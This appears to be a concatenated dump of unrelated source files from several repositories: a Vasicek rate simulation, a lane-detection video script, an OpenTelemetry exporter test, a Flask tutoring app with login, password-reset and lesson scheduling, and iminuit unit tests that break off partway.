x = np.zeros_like(t)
x[0] = x0
a, b, s = self.speed, self.target, self.volatility
for i in range(1, len(t)):
dt = t[i] - t[i-1]
dw = np.random.randn() * np.sqrt(dt)
x[i] = x[i-1] * np.exp(-a * dt)
x[i] += b * (1-np.exp(- a * dt))
x[i] += s * np.sqrt(
(1 - np.exp(- 2 * a * dt)) / (2 * a)
) * np.random.normal()
return x
def main():
np.random.seed(0)
v_model = Vasicek()
v_speed, v_target, v_volatility = .5, -1., 0.1
dt = 1./250
t = np.arange(0, 5., dt)
n_run = 100
speeds = []
targets = []
volatilities = []
for _ in range(n_run):
v_model.speed = v_speed
v_model.target = v_target
v_model.volatility = v_volatility
x = v_model.simulate(0, t)
v_model.fit_parameters(dt, x)
speeds.append(v_model.parameters['speed'])
targets.append(v_model.parameters['target'])
volatilities.append(v_model.parameters['volatility'])
str_format = '.2f'
pprint(f"volatility: {np.min(volatilities):.3f} {np.mean(volatilities):.3f} {np.max(volatilities):.3f}")
pprint(f"speed: {np.min(speeds):.3f} {np.mean(speeds):.3f} {np.max(speeds):.3f}")
pprint(f"target: {np.min(targets):.3f} {np.mean(targets):.3f} {np.max(targets):.3f}")
if __name__ == "__main__":
main()
``` |
{
"source": "jnsagai/advanced-lane-lines-recognition",
"score": 2
} |
#### File: jnsagai/advanced-lane-lines-recognition/AdvancedLaneLinesVideo.py
```python
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import AdvancedComputerVision as acv
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
##############################################################################
######################### GLOBAL PARAMETERS #############################
##############################################################################
sx_thresh = (60 , 100)
mag_thresh = (60, 200)
dir_thresh = (0.5, 1.1)
# HLS Channels threshold
h_thresh = (5, 100)
l_thresh = (210, 255)
s_thresh = (100, 255)
# Bird-eye view offsets
w_offset = 350
h_offset = 0
# Define an offset for the ROI relative to the transformation source polygon
roi_offset = 30
# Get the set of chessboard images for the calibration process
images = glob.glob('camera_cal/calibration*.jpg')
# Instances of Circular Buffers to apply the low-pass filter
left_line_cur_buf = acv.RingBuffer(20)
right_line_cur_buf = acv.RingBuffer(20)
car_center_buf = acv.RingBuffer(20)
# Last lanes fit values
prev_left_fit = np.array([])
prev_right_fit = np.array([])
##############################################################################
############################## MAIN CODE #################################
##############################################################################
# Get the distortion coefficients
mtx, dist = acv.compute_dist_coeff(images)
# Hardcoded values for the matrix transform and distortion coefficients.
# mtx = np.array([[1.15777930e+03, 0.00000000e+00, 6.67111054e+02],
# [0.00000000e+00, 1.15282291e+03, 3.86128938e+02],
# [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
# dist = np.array([[-0.24688775, -0.02373133, -0.00109842, 0.00035108, -0.00258571]])
def process_image(image):
global prev_left_fit
global prev_right_fit
# Undistort the current frame according to the calibration parameters
undistorted = acv.cal_undistort(image, mtx, dist)
# Apply threshold for each component of the HLS color space image
combined_hls = acv.hls_threshold(undistorted, h_thresh, l_thresh, s_thresh)
# Apply Sobel threshold in the x direction
sxbinary = acv.abs_sobel_thresh(undistorted, orient='x', sobel_kernel = 3, thresh = sx_thresh)
# Apply the magnitude threshold
mag_binary = acv.mag_thresh(undistorted, sobel_kernel = 3, thresh = mag_thresh)
# Apply the direction threshold
dir_binary = acv.dir_threshold(undistorted, sobel_kernel = 3, thresh = dir_thresh)
# Combine Sobel, Magnitude and Direction threshold
combined_thres = np.zeros_like(dir_binary, dtype=np.uint8)
combined_thres[(sxbinary == 1) | ((mag_binary == 1) & (dir_binary == 1))] = 1
# Stack each channel
color_binary = np.dstack(( np.zeros_like(combined_thres), combined_thres, combined_hls)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(combined_hls == 1) | (combined_thres == 1)] = 1
# Get the warped image
# For source points I'm grabbing the outer four detected corners
img_h, img_w = combined_binary.shape[:2]
# Define the source points for the projection
src = np.float32([[200,720],
[588,450],
[693,450],
[1120,720]])
# Define the destination points for the projection
dst = np.float32([[w_offset, img_h - h_offset],
[w_offset, h_offset],
[img_w - w_offset, h_offset],
[img_w - w_offset, img_h - h_offset]])
# Create a mask edge for a region of interest based on the projection source
vertices = np.array([[(src[0][0] - roi_offset, src[0][1]),
(src[1][0] - roi_offset, src[1][1] - roi_offset),
(src[2][0] + roi_offset, src[2][1] - roi_offset),
(src[3][0] + roi_offset, src[3][1])]], dtype=np.int32)
# Based on the ROI, apply a mask on the combined binary image
masked_edges = acv.region_of_interest(combined_binary, vertices)
# Warp the image using the projection source and destination
warped_img, M, Minv = acv.warp_image(masked_edges, src, dst)
# Try to get the new line values from the previous one
# If an error occurs, then search for a new line using whole pipeline
if prev_left_fit.size != 0 and prev_right_fit.size != 0:
error, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.search_around_poly(warped_img, prev_left_fit, prev_right_fit)
if (error == True):
_, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.fit_polynomial(warped_img)
else:
_, left_fit, left_fitx, right_fit, right_fitx, ploty, lane_pixels = acv.fit_polynomial(warped_img)
# Use the left and right lanes pixes to calculate the curvature of the road
left_curverad, right_curverad = acv.measure_curvature_real(ploty, lane_pixels)
# Apply a low-pass filter to the lane curvature by buffering the last n reading and taking the average
left_line_cur_buf.append(left_curverad)
right_line_cur_buf.append(right_curverad)
avg_left_line_cur = np.average(left_line_cur_buf.get())
avg_right_line_cur = np.average(right_line_cur_buf.get())
# Calculate the car center position relatively to the lanes
car_center_dev = acv.calc_car_rel_position(warped_img.shape, ploty, left_fit, right_fit)
# Apply low-pass filter
car_center_buf.append(car_center_dev)
avg_car_center = np.average(car_center_buf.get())
# Draw the lane lines back to the original image.
unwarped_image = acv.draw_lines_original_image(undistorted, warped_img, lane_pixels, left_fitx, right_fitx, ploty, Minv)
# Write the metrics on the image
final_image = acv.write_metrics(unwarped_image, avg_left_line_cur, avg_right_line_cur, avg_car_center)
# Save the current lane line fit values
prev_left_fit = left_fit
prev_right_fit = right_fit
return final_image
clip = VideoFileClip('project_video.mp4')
white_clip = clip.fl_image(process_image)
white_clip.write_videofile('output_videos/project_video.mp4', audio=False)
``` |
{
"source": "jnschbrt/data-prepper",
"score": 2
} |
#### File: smoke-tests/otel-span-exporter/app.py
```python
from opentelemetry import trace
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.sdk.resources import Resource
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from grpc import ssl_channel_credentials
resource = Resource(attributes={
"service.name": "PythonService"
})
trace_provider = TracerProvider(resource=resource, )
otlp_exporter = OTLPSpanExporter(
endpoint="otel-collector:4317",
)
trace_provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
trace.set_tracer_provider(trace_provider)
span = trace.get_current_span()
span.set_attribute("user_id", "9999")
def run():
tracer = trace.get_tracer(__name__)
with tracer.start_as_current_span("http-handler"):
with tracer.start_as_current_span("my-cool-function"):
print("I'm doing something!")
if __name__ == "__main__":
run()
``` |
{
"source": "jnsdrtlf/et",
"score": 2
} |
#### File: api/v1/lesson.py
```python
from flask import Blueprint, jsonify, request, g, redirect, url_for
from sqlalchemy import exists
from app.models import db
from app.models.enums import Status, Role, Weekday
from app.models.lesson import Lesson, LessonSchema
from app.models.time import Time
from app.models.user import User
from app.utils import requires_auth_status, requires_auth
from app.utils.tasks import tasks
bp = Blueprint('lesson_api1', __name__)
lesson_schema = LessonSchema()
lesson_schemas = LessonSchema(many=True)
@bp.route('/', methods=['POST'])
@requires_auth_status()
def lesson_post():
"""POST /
Create new `Lesson
:return: JSON object with `success`, `reason` and `redirect` fields
"""
if g.session.user.status != Status.accepted or \
g.session.user.role != Role.tutor:
return jsonify({'success': False, 'reason': 'forbidden'}), 403
try:
weekday = int(request.values.get('weekday', -1))
time = int(request.values.get('time', -1))
print(time)
if time == -1 or \
not db.session.query(exists().where(Time.id == time)).scalar():
return jsonify({'success': False, 'reason': 'time'}), 401
if weekday == -1 or weekday not in Weekday.to_list():
return jsonify({'success': False, 'reason': 'weekday'}), 401
lesson = Lesson()
lesson.school_id = g.session.user.school_id
lesson.tutor_id = g.session.user_id
lesson.weekday = Weekday(weekday)
lesson.time_id = time
db.session.add(lesson)
db.session.commit()
tasks.create_events_now(lesson.id)
return redirect(url_for('index.index'))
#return lesson_schema.jsonify(lesson)
except Exception as e:
raise e
return jsonify({'success': False, 'reason': 'other'}), 401
@bp.route('/user/<int:user_id>', methods=['GET'])
@requires_auth()
def get_lesson_by_user(user_id):
""" GET /user/<int:user_id>
Get all lessons of a specific user where user_id is the unique id of
the user in question.
:return: `LessonSchema`
"""
_lessons = db.session.query(Lesson).join(User, Lesson.students) \
.filter(
(User.id == user_id) |
(Lesson.tutor_id == user_id)) \
.all()
return lesson_schemas.jsonify(_lessons)
```
#### File: api/v1/session.py
```python
from datetime import timedelta
from flask import Blueprint, request, jsonify, g, url_for
from werkzeug.exceptions import Unauthorized
from app.models import db
from app.models.enums import Status
from app.models.user import User
from app.models.session import Session
from app.utils.tasks import tasks
from app.utils import requires_auth_status, requires_auth
bp = Blueprint('session_api1', __name__)
def login(email, password, remember: bool, next_url):
"""Login
This is seperated into a function as this code is also needed during
signup (see `user_api1.user_post`)
Important: This function needs to be called within the context of an
request. Otherwise, accessing `g` and `url_for` wont work.
"""
try:
user: User = db.session.query(User).filter(User.email == email).one()
if user.check_password(password):
g.session = Session(user, session_only=(not remember))
g.session.browser = str(request.user_agent.browser or '?')
g.session.platform = str(request.user_agent.platform or '?')
db.session.add(g.session)
db.session.commit()
expiration_date = g.session.last_use + timedelta(days=60)
tasks.remove_session.schedule(args=(g.session.id,), eta=expiration_date)
if user.status is Status.pending:
next_url = url_for('auth.wait')
if not user.email_confirmed:
next_url = url_for('auth.confirm')
return jsonify({
'success': True,
'redirect': next_url,
'sid': g.session.token})
else:
raise Exception()
except Exception as e:
return jsonify({'success': False, 'reason': 'credentials'}), 401
@bp.route('/', methods=['POST'])
def session_post():
"""POST /
Use this route to login a user.
Required values:
- `email`
- `password`
:return: JSON object with `redirect` url or `reason`
"""
next_url = url_for('index.index')
if g.session:
return jsonify({'redirect': next_url}), 200
email = request.values.get('email', default='')
password = request.values.get('password', default='')
remember = request.values.get('remember', default='off')
return login(email, password, bool(remember == 'on'), next_url)
@bp.route('/<session_id>', methods=['DELETE'])
@requires_auth()
def session_delete(session_id):
"""DELETE /<session_id>
Delete a session. Notice: The user rquesting
this deletion must be the user owning the
corresponding session.
:return: Success if session was deleted successfully.
"""
try:
session = db.session.query(Session).filter(Session.id.is_(session_id)).one()
if not session.user_id == g.session.user.id:
return Unauthorized()
if session.id == g.session.id:
g.session = None
db.session.delete(session)
db.session.commit()
return jsonify({'success': True}), 200
except Exception as e:
return jsonify({'success': False}), 404
```
#### File: app/blueprints/auth.py
```python
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.sql import and_
from werkzeug.exceptions import Unauthorized, Forbidden, NotFound
import urllib.parse
from flask import Blueprint, request, jsonify, g, redirect, render_template, flash, url_for
from flask_babel import gettext
from app.models.enums import Status, Role
from app.models.user import User
from app.models.subject import Subject
from app.models.grade import Grade
from app.models import db
from app.utils import requires_auth
import app.utils.tasks.mail as mail
bp = Blueprint('auth', __name__)
@bp.route('/signup', methods=['GET'])
def signup_get():
"""GET /signup
This route only works if the user is not yet authenticated.
The user will be redirected to next_url otherwise.
:return: render_template or redirect
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
return render_template('sites/auth/signup.html', title=gettext('Signup'))
@bp.route('/login', methods=['GET'])
def login_get():
"""GET /login
This route only works if the user is not yet authenticated.
The user will be redirected to next_url otherwise.
:return: render_template or redirect
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
return render_template('sites/auth/login.html', title=gettext('Login'))
@bp.route('/login', methods=['POST'])
def login_post():
"""POST /login
Deprecated. Use the api backend (`session_api1.session_post`) to
create a new session and log in.
"""
return redirect(url_for('session_api1.session_post'))
@bp.route('/auth/reset', methods=['GET'])
def reset_get():
"""GET /auth/reset?token=<string:token>
Reset password route. If a valid token is provided,
the password can be reset. If no token is provided,
the email textbox will be rendered to request a new
reset link via email.
:return: Template for password reset
"""
next_url = url_for('index.index')
if g.session:
flash(gettext('You are already logged in'), 'success')
return redirect(next_url)
token = request.args.get('token')
if token:
try:
user = db.session.query(User) \
.filter((User.password_token == token) & User.reset_active) \
.one()
if user.is_reset_expired():
return NotFound()
return render_template('sites/auth/reset.html',
title=gettext('Reset'),
password=True, password_token=token)
except NoResultFound:
return NotFound()
else:
return render_template('sites/auth/reset.html',
title=gettext('Reset'),
email=True, password=False)
@bp.route('/auth/reset-status')
def reset_status():
"""GET /auth/reset-status
Simple status page for password reset.
"""
return render_template(
'sites/auth/reset_status.html', title=gettext('Reset'),
sent=request.values.get('sent', default=False),
success=request.values.get('success', default=False))
@bp.route('/auth/reset', methods=['POST'])
def reset_post():
"""POST /auth/reset
Request a password reset link via email or
reset the password if a token is specified.
:return:
"""
if g.session:
# User is already authenticated
return jsonify({'redirect': url_for('index.index')})
form = request.values.get('form', default='email')
token = request.values.get('token', default='')
email = request.values.get('email', default='')
password = request.values.get('password', default='')
if form == 'password':
try:
user: User = db.session.query(User) \
.filter((User.password_token == token) & User.reset_active) \
.one()
if user.is_reset_expired():
return jsonify({'success': False, 'reason': 'expired'}), 401
if len(password) < 8:
return jsonify({'success': False, 'reason': 'password'}), 401
user.set_password(password)
db.session.commit()
next_url = url_for('auth.reset_status', success=True)
return jsonify({'success': True, 'redirect': next_url})
except NoResultFound:
return jsonify({'success': False, 'reason': 'token not found'}), 401
else:
try:
user: User = db.session.query(User) \
.filter(User.email == email).one()
user.reset_password()
db.session.commit()
reset_url = urllib.parse.urljoin(
request.host_url,
url_for('auth.reset_get', token=user.password_token))
kwargs = {
'subject': gettext('Reset Password'),
'body': reset_url,
'recipients': [user.email]
}
mail.send_mail(**kwargs)
next_url = url_for('auth.reset_status', sent=True)
return jsonify({'success': True, 'redirect': next_url})
except NoResultFound:
return jsonify({'success': False, 'reason': 'email'}), 401
@bp.route('/auth/confirm', methods=['GET'])
@requires_auth()
def confirm():
"""GET /auth/confirm
Confirm the valid email address. The token must
be valid.
:return: redirect if successful
"""
if g.session.user.email_confirmed:
return redirect(url_for('index.index'))
token = request.args.get('token')
if token:
try:
user: User = db.session.query(User) \
.filter(User.confirmation_token == token).one()
user.email_confirmed = True
user.confirmation_token = None
db.session.merge(user)
db.session.commit()
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'),
sent=False, success=True), 200
except NoResultFound:
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'),
sent=False, success=False), 401
else:
return render_template('sites/auth/confirm.html',
title=gettext('Confirm Email'), sent=True), 200
@bp.route('/auth/wait')
@requires_auth()
def wait():
if g.session.user.status is Status.accepted:
return redirect(url_for('index.index'))
return render_template('sites/auth/wait.html',
title=gettext('Wait'),
status=g.session.user.status.value)
@bp.route('/logout')
def logout():
if g.session:
g.session.revoked = True
db.session.commit()
g.session = None
return redirect(url_for('index.index'))
@bp.route('/config', methods=['GET'])
def config():
if g.school:
return redirect(url_for('index.index'))
stage = request.args.get('stage', 'school')
if not g.school:
pass
#stage = 'school'
template = 'sites/auth/config-%s.html'
if stage in ['school', 'admin', 'subjects', 'time', 'grades']:
return render_template(template % stage, title=gettext('Config'))
else:
return NotFound()
"""@bp.route('/config', methods=['POST'])
@requires_auth()
def config_post():
if g.session.user.role != Role.admin \
and g.session.user.status != Status.accepted:
return Forbidden()
name = request.values.get('name', '')
subjects = request.values.getlist('subjects[]')
grades = request.values.getlist('grades[]')
g.config = Config()
g.config.id = 1
g.config.school_name = name
db.session.merge(g.config)
for subject in subjects:
_subject = Subject()
_subject.school_id = g.school.id
_subject.name = subject
db.session.add(_subject)
for grade in grades:
_grade = Grade()
_grade.school_id = g.school.id
_grade.name = grade
db.session.add(_grade)
db.session.commit()
return jsonify({'success': True, 'redirect': url_for('index.index')})
"""
```
#### File: et/app/__init__.py
```python
import os
import warnings
warnings.filterwarnings('ignore', message='greenlet.greenlet size changed')
from flask import Flask, request, g, redirect, url_for
# TODO add option `minimal=False` for things like task
def create_app(root_path, minimal=False):
app_name = 'minimal_app' if minimal else __name__
app = Flask(app_name, root_path=root_path)
config = os.environ.get('CONFIG', default='config/dev.cfg')
secrets = os.environ.get('SECRETS', default='config/secret.cfg')
app.config.from_pyfile(os.path.abspath(config))
app.config.from_pyfile(os.path.abspath(secrets))
app.secret_key = app.secret_key.encode()
app.static_url_path = app.config.get('STATIC_FOLDER')
app.static_folder = os.path.join(app.root_path, app.static_url_path)
app.template_folder = os.path.join(
app.root_path, app.config.get('TEMPLATE_FOLDER'))
from app.models.event import Event
from app.models.grade import Grade
from app.models.lesson import Lesson
from app.models.period import Period
from app.models.relationships import UserGrade, UserLesson, UserSubject
from app.models.report import Report
from app.models.school import School
from app.models.session import Session
from app.models.subject import Subject
from app.models.time import Time
from app.models.user import User
from app.models import db
db.init_app(app)
if not minimal:
from app.blueprints.api import v1
from app.blueprints.api.v1 import user as user_api
from app.blueprints.api.v1 import lesson as lesson_api
from app.blueprints.api.v1 import session as session_api
from app.blueprints import auth
from app.blueprints import index
from app.blueprints import user as user
from app.models.enums import Locale
from app.models import ma
from app.i18n import babel, moment
import app.utils as utils
from app.utils.tasks import tasks
babel.init_app(app)
moment.init_app(app)
ma.init_app(app)
db.create_all(app=app)
@app.after_request
def call_after_request_callbacks(response):
for callback in getattr(g, 'after_request_callbacks', ()):
callback(response)
return response
@app.before_request
def auth_middleware():
sid = request.cookies.get(
'sid', default='') or request.values.get('sid')
session_result = Session.verify(sid)
if session_result:
g.session = session_result
g.locale = g.session.user.locale.value
else:
g.session = None
g.locale = utils.get_best_locale().value
@utils.after_this_request
def set_cookie(response):
if g.session:
g.session.set_cookie(response)
@app.before_request
def config_middleware():
try:
g.school = db.session.query(
School).filter(School.id == 1).one()
except:
g.school = False
endpoints = [
'static', 'auth.config', None,
'school_api1.school_post',
'school_api1.school_put'
]
if request.endpoint not in endpoints:
app.logger.info('No school found. Redirect to config')
return redirect(url_for('auth.config', stage='school'))
@babel.localeselector
def get_locale():
return g.locale
# ------------
# API routes
# ------------
app.register_blueprint(v1.bp, url_prefix='/api/v1')
app.register_blueprint(user_api.bp, url_prefix='/api/v1/user')
app.register_blueprint(session_api.bp, url_prefix='/api/v1/session')
app.register_blueprint(lesson_api.bp, url_prefix='/api/v1/lesson')
# ------------
# Frontend
# ------------
app.register_blueprint(auth.bp)
app.register_blueprint(user.bp, url_prefix='/user')
app.register_blueprint(index.bp)
tasks.create_events()
return app, db
```
#### File: app/models/enums.py
```python
from enum import Enum
from aenum import MultiValueEnum
class Weekday(Enum):
"""Weekdays
Used to identify weekly repeating lessons. Starting with `monday`
according to the python documentation (see `date.weekday()`)
"""
monday = 0
tuesday = 1
wednesday = 2
thursday = 3
friday = 4
saturday = 5
sunday = 6
@staticmethod
def to_list():
return list(map(lambda c: c.value, Weekday))
class Role(Enum):
"""User roles
none: default, no priviledges
admin: highest privileges
editor: maintainer for a specific school
tutor: student or tutor
has to be approved (see `Status`)
student: student (can only access one school)
"""
none = 'none'
admin = 'admin'
editor = 'editor'
tutor = 'tutor'
student = 'student'
class Status(Enum):
"""Status for approval of users
pending: has to be approved
accepted: approved
rejected: not eligible for teaching. No reason given
"""
pending = 'pending'
accepted = 'accepted'
rejected = 'rejected'
class Locale(MultiValueEnum):
"""Supported locale settings
default: 'de'
A multi value enum is used for different formats. Some browser
(e.g. Safari) use the long format (e.g. `en_US`) while others use a
smaller format (such as `de`).
"""
de = 'de_DE', 'de'
en = 'en_US', 'en'
@staticmethod
def to_list():
return list(map(lambda c: c.value, Locale))
@staticmethod
def to_short_list():
return list(map(lambda c: c.value[:2], Locale))
@staticmethod
def default():
return Locale.de
```
#### File: app/models/school.py
```python
from app.models import db, ma
class School(db.Model):
"""School
This table stores the configuration for each individual school.
Schools are addressed through their short name.
"""
__tablename__ = 'school'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
school_name = db.Column(db.String(48), nullable=False)
# `short_name` can be used as a subdomain (e.g. abc.tuutor.de)
short_name = db.Column(db.String(8), nullable=False, unique=True)
# Duration of a typical lesson (see `time` or `lesson`) in minutes
lesson_duration = db.Column(db.Integer, nullable=False, default=45)
def __repr__(self):
return f'<School {self.short_name}>'
```
#### File: app/models/user.py
```python
import secrets
import hashlib
from datetime import datetime, timedelta
import bcrypt
from app.models import db, ma
from app.models.enums import Role, Status, Locale, Weekday
class User(db.Model):
"""
User object to store user information
"""
default_picture_path = '/static/images/profile/%s.png'
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
school_id = db.Column(db.Integer, db.ForeignKey('school.id'),
nullable=False)
# personal information
name = db.Column(db.String(48), nullable=False)
email = db.Column(db.String(48), unique=True, nullable=False)
password = db.Column(db.LargeBinary, nullable=False)
teacher_name = db.Column(db.String(48), nullable=True)
picture = db.Column(db.String(128), nullable=True, unique=False)
has_placeholder = db.Column(db.Boolean, nullable=False, unique=False,
default=True)
locale = db.Column(db.Enum(Locale), nullable=False, default=Locale.en)
# email confirmation
email_confirmed = db.Column(db.Boolean, nullable=False, default=False)
confirmation_token = db.Column(db.String(32), unique=True, nullable=True)
# password reset
password_token = db.Column(db.String(32), unique=True, nullable=True)
last_reset = db.Column(db.DateTime, nullable=True, unique=False)
reset_active = db.Column(db.Boolean, nullable=False, default=False)
# school relationship
role = db.Column(db.Enum(Role), nullable=False, default=Role.none)
status = db.Column(db.Enum(Status), nullable=True, default=Status.pending)
grade_id = db.Column(db.Integer, db.ForeignKey('grade.id'), nullable=True)
# subjects
subjects = db.relationship('Subject', secondary='user_subject',
back_populates='users')
grade = db.relationship('Grade', foreign_keys=[grade_id],
back_populates='users')
tutor_grades = db.relationship('Grade', secondary='user_grade')
reports = db.relationship('Report', back_populates='user')
tutor_lessons = db.relationship(
'Lesson', back_populates='tutor',
primaryjoin='Lesson.tutor_id == User.id')
student_lessons = db.relationship(
'Lesson', secondary='user_lesson',
back_populates='students',
primaryjoin='(Lesson.id == UserLesson.lesson_id) & '
'(User.id == UserLesson.user_id)')
sessions = db.relationship('Session', back_populates='user')
def __init__(self, role: Role):
self.email_confirmed = False
self.confirmation_token = secrets.token_hex(32)
self.role = role
self.status = Status.pending
def __repr__(self):
return f'<User {self.name}>'
def reset_password(self):
self.last_reset = datetime.now()
self.reset_active = True
self.password_token = secrets.token_hex(32)
def is_reset_expired(self):
return (self.last_reset + timedelta(minutes=30)) < datetime.now()
def update_email(self, email):
self.email = email
self.email_confirmed = False
self.confirmation_token = secrets.token_hex(32)
def set_password(self, password):
self.reset_active = False
self.password_token = None
self.password = <PASSWORD>.hashpw(password.encode(), <PASSWORD>.gensalt(12))
def check_password(self, password):
return bcrypt.checkpw(password.encode(), self.password)
def set_picture(self, name: str):
self.picture = self.default_picture_path % name
def get_initials(self):
initials = self.name[0]
if ' ' in self.name:
# add first letter of last name
initials += self.name.split(' ')[-1][0]
return initials
class UserSchema(ma.Schema):
subjects = ma.Nested('SubjectSchema', many=True, exclude=('users',))
grade = ma.Nested('GradeSchema', exclude=('users',))
tutor_grades = ma.Nested('GradeSchema', many=True, exclude=('users',))
tutor_lessons = ma.Nested('LessonSchema', many=True, exclude=('tutor',))
student_lessons = ma.Nested('LessonSchema', many=True, exclude=('students',))
role = ma.Method('get_role')
status = ma.Method('get_status')
def get_role(self, obj: User):
return obj.role.value
def get_status(self, obj: User):
return obj.status.value
class Meta:
fields = (
'id', 'name', 'picture',
'role', 'subjects', 'status',
'grade', 'tutor_grades', 'teacher_name',
'tutor_lessons', 'student_lessons')
class UserSchemaWeekdays(UserSchema):
class Meta:
fields = (
'id', 'name', 'picture',
'role', 'subjects', 'status',
'grade', 'tutor_grades', 'teacher_name',
'tutor_lessons', 'student_lessons', 'weekdays')
```
#### File: utils/tasks/picture.py
```python
from os import path
import random
import secrets
from PIL import Image, ImageFont, ImageDraw
from app import create_app
from app.models.user import User
from app.utils.tasks import huey
width = 480
height = 480
font_size = 260
colors = [
[
(23, 126, 137, 255),
(255, 255, 255, 140)
],
[
(8, 76, 97, 255),
(255, 255, 255, 140)
],
[
(219, 58, 52, 255),
(255, 255, 255, 140)
],
[
(255, 200, 87, 255),
(31, 45, 61, 178)
],
[
(50, 48, 49, 255),
(255, 255, 255, 140)
]
]
@huey.task()
def create_user_image(user_id):
app, db = create_app(None, minimal=True)
with app.app_context():
user = db.session.query(User).filter(User.id.is_(user_id)).one()
color = random.choice(colors)
image = Image.new('RGBA', (width, height), color[0])
initials_image = Image.new('RGBA', image.size, (0, 0, 0, 0))
initials = user.get_initials()
font = ImageFont.truetype(path.join(app.static_folder, 'css', 'Roboto-Light.ttf'), font_size)
draw = ImageDraw.Draw(initials_image)
_w, _h = draw.textsize(initials, font=font)
draw.text(((width - _w) / 2, (height - font_size) / 2.4), initials, fill=color[1], font=font)
image_name = f'{user.id}-{secrets.token_hex(16)}'
image_path = path.join(app.static_folder, 'images', 'profile', f'{image_name}.png')
image = Image.alpha_composite(image, initials_image)
image = image.convert('RGB')
image.save(image_path)
del image
user.set_picture(image_name)
db.session.merge(user)
db.session.commit()
```
#### File: utils/tasks/tasks.py
```python
from datetime import datetime, timedelta
from huey import crontab
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.sql import exists
from app import create_app
from app.models.session import Session
from app.models.period import Period
from app.models.event import Event
from app.models.lesson import Lesson
from app.utils.tasks import huey
@huey.task()
def remove_session(session_id):
"""Remove session
"""
app, db = create_app(None, minimal=True)
with app.app_context():
try:
session: Session = db.session.query(session_id) \
.filter(Session.id == session_id) \
.one()
if session.is_expired():
db.session.delete(session)
else:
expiration_date = session.last_use + timedelta(days=60)
remove_session.schedule(args=(session_id,), eta=expiration_date)
except NoResultFound:
print(f'Session {session_id} not found.')
@huey.periodic_task(crontab(day_of_week='1'))
def create_events():
app, db = create_app(None, minimal=True)
with app.app_context():
lessons = db.session.query(Lesson).all()
for lesson in lessons:
create_event_for_lesson(db, lesson)
@huey.task()
def create_events_now(lesson_id):
app, db = create_app(None, minimal=True)
with app.app_context():
lesson: Lesson = db.session.query(Lesson) \
.filter(Lesson.id == lesson_id).one()
create_event_for_lesson(db, lesson)
def next_weekday(date, weekday: int):
days_ahead = weekday - date.weekday()
if days_ahead <= 0:
days_ahead += 7
return (date + timedelta(days=days_ahead))
def create_event_for_lesson(db, lesson):
events = db.session.query(Event) \
.filter((Event.lesson_id == lesson.id) &
(Event.date > datetime.now().date())) \
.order_by(Event.date) \
.all()
last_date = datetime.now().date() if len(events) == 0 else events[-1].date
for i in range(len(events), 4):
next_date = next_weekday(last_date, lesson.weekday.value)
"""current_period = db.session.query(Period) \
.filter((Period.school_id == lesson.school_id) &
(Period.begin_date < next_date) &
(Period.due_date > next_date)) \
.one()"""
_event = Event()
_event.date = next_date
_event.school_id = lesson.school_id
_event.lesson_id = lesson.id
_event.period_id = 1
db.session.add(_event)
last_date = next_date
db.session.commit()
``` |
{
"source": "jnsdrtlf/iminuit",
"score": 2
} |
#### File: iminuit/tests/test_util.py
```python
from iminuit import util
import pytest
from argparse import Namespace
from numpy.testing import assert_equal, assert_allclose
import numpy as np
from iminuit._core import MnUserParameterState
def test_ndim():
ndim = util._ndim
assert ndim(1) == 0
assert ndim([]) == 1
assert ndim([[]]) == 2
assert ndim(None) == 0
assert ndim((None, None)) == 1
assert ndim(((1, 2), None)) == 2
assert ndim((None, (1, 2))) == 2
def test_ValueView():
state = MnUserParameterState()
state.add("x", 1.0, 0.1)
state.add("y", 2.2, 0.1)
state.add("z", 3.3, 0.1)
v = util.ValueView(
Namespace(
_var2pos={"x": 0, "y": 1, "z": 2},
_pos2var=("x", "y", "z"),
npar=3,
_last_state=state,
_copy_state_if_needed=lambda: None,
)
)
assert repr(v) == "<ValueView x=1.0 y=2.2 z=3.3>"
assert str(v) == repr(v)
v[:] = (1, 2, 3)
assert_equal(v, (1, 2, 3))
v[1:] = 4
assert_equal(v, (1, 4, 4))
v["y"] = 2
assert_equal(v, (1, 2, 4))
v["y":] = 3
assert_equal(v, (1, 3, 3))
v[:"z"] = 2
assert_equal(v, (2, 2, 3))
def test_Matrix():
m = util.Matrix(("a", "b"))
m[:] = [[1, 1], [1, 4]]
assert_equal(m, ((1, 1), (1, 4)))
assert repr(m) == "[[1. 1.]\n [1. 4.]]"
c = m.correlation()
assert_allclose(c, ((1.0, 0.5), (0.5, 1.0)))
assert m["a", "b"] == 1.0
assert m["a", 1] == 1.0
assert m[1, 1] == 4.0
assert_equal(m["b"], (1, 4))
m *= 2
assert_equal(m, ((2, 2), (2, 8)))
assert_allclose(np.dot(m, (1, 1)), (4, 10))
with pytest.raises(TypeError):
util.Matrix("ab")
with pytest.raises(TypeError):
util.Matrix(1)
def test_Param():
values = 3, "foo", 1.2, 3.4, None, False, False, True, True, False, 42, None
p = util.Param(*values)
assert p.number == 3
assert p.name == "foo"
assert p.value == 1.2
assert p.error == 3.4
assert p.merror is None
assert p.is_const == False
assert p.is_fixed == False
assert p.has_limits == True
assert p.has_lower_limit is True
assert p.has_upper_limit is False
assert p.lower_limit == 42
assert p.upper_limit is None
assert repr(p) == (
"Param(number=3, name='foo', value=1.2, error=3.4, merror=None, "
"is_const=False, is_fixed=False, has_limits=True, has_lower_limit=True, "
"has_upper_limit=False, lower_limit=42, upper_limit=None)"
)
def test_Params():
p = util.Params(
[
util.Param(
